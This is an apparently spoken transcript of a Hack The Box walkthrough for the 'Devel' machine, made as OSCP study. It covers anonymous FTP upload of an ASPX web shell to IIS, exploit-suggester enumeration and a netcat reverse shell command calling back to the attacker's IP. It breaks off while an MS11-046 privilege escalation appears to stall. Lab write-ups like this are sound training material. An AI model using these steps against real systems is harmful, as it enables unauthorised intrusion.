Hey, so today I'm going to be trying to do a few different walkthroughs of some Hack the Box machines that I've managed to root. I'm studying for the OSCP, so I'm going to be going and doing these walkthroughs without using any Metasploit, as you're not allowed to use it on the exam. So I figured I should practice the manual enumeration and exploitation processes as much as I possibly can. And yeah, let's get started. So the first machine is going to be Devel. I would run an Nmap scan usually, doing something like this, checking to see what services are open, checking our default scripts, and outputting it to Nmap format because that's just my personal preference. But I've already gone and done that just to save a little bit of time, so let's take a look at the scan report. So we have two services that are running. We have an FTP service, which has anonymous login allowed, and a Microsoft IIS server. What's interesting about these two is that you can see there's an IIS start.htm page in the FTP server's directory. So it seems like files that are on here may be able to be run on the server. Seems like it would make some sense. So I've opened up that web server right here. What I'm going to want to try to do is see if I can make a connection with this server and potentially download and upload files to it. Oh, oops. I accidentally just hit enter. So let's do FTP 10.10.10.5. Since anonymous logins allowed, it's anonymous. And let's see if we can get IIS start dot oh, HTML. We can. So let's see if we can also upload a file real quick. Hello to test.html. And now we can see if we can upload it. We were able to upload it. Sweet. So now if we navigate to test.html, yep, we see hello. That's exactly what we wanted. So since this is an IIS server, it's going to be utilizing Microsoft's .NET framework, which is going to be running ASP and ASPX code, as you can see. There seem to be some shells on here, but we don't really know what these look like, and we can just upload something of our own. So rather than going and trying to reverse engineer or just look through them, since it's going to be non-binary, or they're not going to be binary, so it wouldn't be really hard to do that, but we might as well upload something that we've used in the past or are a little familiar with. So there's this command shell, it's a web shell that is written with the .NET framework, and we should be able to find it. Um, yeah, I have it over here just since when I was solving the challenge, I used this exact same shell, but there are a few others you can use. It comes as default in the seclists project, which is super useful. So it has different word lists, different shells, lots of different payloads, just a lot of really different useful tools that you can use to make your workflow easier. So if you don't know what it is, I highly recommend checking it out. So let's not copy that one over because I don't know if I made modifications to it when I was working on this like a few weeks ago. Let's copy this over here and see if we can upload ASPX. Sweet, so it's here, cmd.aspx. And now we have the ability to execute some code. First, I guess I'll just use dir to see what's on here. So we have a few different files. We're in Windows System 32, inetserv. One quick thing, I did notice that it seemed to save my commands that I entered in when I was doing this. To be honest, I did it a few weeks ago, which is why I'm trying to go and do the walkthrough now. Make sure that I really gathered all of the knowledge and maintained that knowledge from rooting this box. So I'm going to go ahead and open up an incognito tab which should mean that it's not going to give me these recommendations. Yeah, sweet. Okay, so, oh, never mind, it still does that. That's kind of unfortunate, but either way, what we need to look for first, since this is a Windows machine, is we need to be able to find what system information this specific machine has, so we're able to properly enumerate it. Since it's not running any services like Samba or any RPC services, anything like that, our attack surface is going to be a little more limited. What we should do first is go and check out system info. Now, this is being kind of annoying to read. This is kind of annoying to read. Is it? Okay, sweet. So we can read it over here. Devel, Microsoft Windows 7 Enterprise, OS version 6177600. There's a lot of different information. The most interesting piece of information, though, is that there's no hotfixes applied, meaning that this is a completely unpatched Windows 7 machine, and we definitely know that there are quite a few different vulnerabilities in the Windows operating system, even now, especially in Windows 7. So there's a few different things we could do. One, we can go and check. There's this script that I downloaded and have used in the past. I also recommend it. Let me take a look and try to find it real quick. It should be Windows user share win exploits. Let's see what's in here. Yeah, Windows exploit suggester. So what we would need to do to use this script, not enough arguments, -H, we can give it a file of system info, which is what we just grabbed over here, and a database, which is the security database. I've already generated that up in the same directory, so we can use that and it should suggest us some exploits. I'm going to just make a file called system info. Actually, just for verbosity, Devel system info. And now user share win exploits Windows exploit suggester.py -I Devel system info and -database user share win exploits 2020. So we'll start running this. Meanwhile, let's take a look and see if we can find any vulnerabilities related to this. CVEs. I guess that's not a bad way to search. And first thing we see is exploit database. Local privilege escalation. MS11046. So, let's take a look at what the vulnerable software on here is. We have a few different Windows 7 versions. Supported vulnerable software. Build 7600. There's one processor installed. It's an x86 based PC. So these are all important. Windows 7 x86 is supported vulnerable software. So considering this is local privilege escalation and we're able to run the code on here, we might be able to just use that to get root. Let's see what our script output gave us. Vulnerability in kernel could allow pervesc. Vulnerabilities in kernel mode drivers, remote code execution, print spooler service, kernel exploits. So there's a lot of different potential kernel exploits over here. But considering that we have the exact build number, and that build number seems to be vulnerable to MS11046, this script didn't actually even output that for us. So we could also try to run a different script. I'm going to do this just so I can go and see what the different outputs are going to be. Locate Sherlock.ps1. So again, I've used it in a different script, or I've used it for other machines. So Sherlock.ps1. Now we want a way to actually interact with this system outside of just using a web shell for two reasons. One, if we are going to be executing any code on here, it might not be spitting it to standard output when we're actually, the web shell might not be able to grab that output properly if we are running some pervs code, for example. And another reason to do that is just because we're using kind of a primitive way to interact with it. We don't really have access to the system with a shell. We're just able to send some web application commands, and if that web application was to get patched or they disabled the ability to upload files to FTP, then we wouldn't have actual access to the system. But if we go and upload some way to, let's say, use Netcat or some other way for the server to communicate with us, the system to communicate with us and give us a reverse shell, then we're going to be in a better spot. So let's see if there's Netcat on here right now. It doesn't seem like it's on there. So another thing I'm going to do is to locate netcat.exe, and that's also part of the Seclist project. It's going to be in here, and I've used that for a lot of different boxes. So we can get this file over and execute it in a few different ways. One, we could try to execute it through this FTP server and the web interface, or we could try to open up a Samba share, which would let the computer look into our directory and onto our system to execute what we want, just because it may not always work properly with the web service. But as I haven't tried using it with this web, or uploading it through FTP and executing it through the web server, I'm going to actually go ahead and see what happens if we do that. So FTP 10.10.10.5, anonymous, put nc.exe. Now let's duplicate this just so we see what happens. And yep, we're just able to download the file. That's most definitely not what we want to happen. We're not able to actually execute the code, which we kind of need to do. So we're going to want to try to use a Samba server, maybe. So what that would let us do is that would let this computer look at our IP and see what files are in a directory that we're sharing with the other devices on our network. And it would let us execute code through that, or maybe it would let us download files through the server. We can interact with a lot of different things that are going to be running on. Kind of lost my train of thought and I'm rambling right now. Long story short, SMB is going to be a pretty decent way for us to go. So SMB server.py, this is a script that I've used on a few different machines and I really like it. You're probably going to see that it shows up in some solved hack the box directories just because it's a really useful tool. So interesting, it didn't show up there. First thing we're going to need to do is we are going to need to make a directory to actually share, unless we want to share the entire Devel directory, but I'd rather not do that. Let's do, why not just call it SMB? Let's move netcat.exe into SMB. Is there anything else that we need to move? We could also just move Sherlock in there. So now what we need to do is we have this, no, smb server.py. Yeah, so we can share, we need to have a share name and a share path. So like you can see from this example, my share and the path is just temp. So the directory or the share that we want to share with them is called SMB, and we can call it really anything we want. That's just how the Windows machine is going to be able to access it with our IP and share name, IP, share name, something like that, and then the files that we want. So let's just, oh my, let's just call it share and then SMB. Let's see what our IP address is. We're 10, 10, 14, 14. So we have, let's see if it's able to access, see if it's able to see what's on here. Oh, yep, it is. So we have Sherlock.ps1 and netcat.exe. So what we can do is use this to create a reverse shell back to our box. So we're going to want to run an ncat listener. I like port 9000 just out of preference, but you can really do anything. So we can use this, then nc.exe-e, which should be the command to execute, command.exe, since it's a Windows machine. Otherwise, if it was a Linux machine, you'd want to use bash, sh, or some other type of reverse shell. But we can just do netcat.exe-e command.exe, then our IP address, which was 10, 10, 14, 14, and port 9000. Let's copy this in case it fails for some reason. Oh, it just went through. Interesting. So that did actually fail for some reason. Let's try -c. Ah, okay, it's hanging, so we might get our shell. Huh, that also went through. Maybe it's because of the location of this. Command.exe 9000. Oh, no, I already have 9000 on there. So it's authenticating. It's able to get there. Okay, yep, there we go. It was just because of the location of that command.exe being flipped with the port and IP address. So I guess this binary just doesn't like that. So we can see that we are IAS app pool, and now we're going to need to figure out a way to escalate our privileges. But we already had found that this system seems to be vulnerable to MS11-046. If we run this, doesn't seem like anything is happening. Might just be stalling. We'll give it a second. I guess I can use this time to drink my water.